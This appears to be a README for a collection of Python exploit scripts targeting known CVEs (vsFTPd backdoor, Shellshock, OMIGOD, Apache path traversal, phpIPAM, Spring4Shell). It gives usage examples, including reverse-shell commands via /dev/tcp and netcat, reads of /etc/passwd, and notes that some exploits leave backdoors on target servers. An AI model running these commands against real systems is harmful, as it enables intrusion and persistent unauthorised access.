VARIOUS CVE EXPLOITS FROM MY COLLECTION

FOR EDUCATIONAL PURPOSES ONLY

These scripts are written in python3 and could probably have been cleaner. Feel free to hack and improve them to your liking.

vsFTPd 2.3.4 Backdoor exploit

Usage:

python3 exploit.py <TARGET_IP> (<TARGET_PORT>)

Examples:

python3 exploit.py 10.10.10.10
python3 exploit.py 10.10.10.10 21

"Shellshock" or "Bashdoor" (GNU Bash versions from 1.14 up to, but not including, 4.3)

Usage:

python3 exploit.py <TARGET_URL> <COMMAND>

Examples:

python3 exploit.py http://10.10.60.20/cgi-bin/test.cgi    (Default "cat /etc/passwd")
python3 exploit.py https://www.target.com/cgi-bin/file.cgi "cat /etc/passwd"
python3 exploit.py http://10.10.60.20/cgi-bin/test.cgi "bash -i >& /dev/tcp/10.10.10.10/1337 0>&1"

Open Management Infrastructure Remote Code Execution "OMIGOD" (1.6.8.0 and below)

Usage:

python3 exploit.py <TARGET_IP> <COMMAND>

Examples:

python3 exploit.py 10.10.10.10 "id"
python3 exploit.py 172.17.0.1 "cat /etc/passwd"

Apache 2.4.49 & 2.4.50 Path Traversal and Basic Unix Reverse Shell

Usage:

python3 exploit.py <TARGET_URL> <FILE>

Examples:

python3 exploit.py https://www.target.com /etc/passwd
python3 exploit.py http://10.10.10.10 "/etc/passwd"

phpIPAM 1.4.5 - SQLI to Authenticated Remote Code Execution

<!> WARNING <!> THIS EXPLOIT LEAVES AN UNPROTECTED BACKDOOR FILE ON THE TARGET SERVER!

Usage:

python3 exploit.py <TARGET_URL> <USERNAME> <PASSWORD> <COMMAND>

Examples:

python3 exploit.py https://www.target.com "admin" 'P@ssw0rd123!' id
python3 exploit.py http://10.10.10.10 admin password "nc 10.10.10.255 1337 -e /bin/sh"

Spring Framework RCE (before 5.2) "Spring4Shell"

<!> WARNING <!> THIS EXPLOIT LEAVES A PASSWORD-PROTECTED BACKDOOR FILE ON THE TARGET SERVER!

Usage:

python3 exploit.py <TARGET_URL>

Examples:

python3 exploit.py https://www.target.com
python3 exploit.py http://10.10.10.10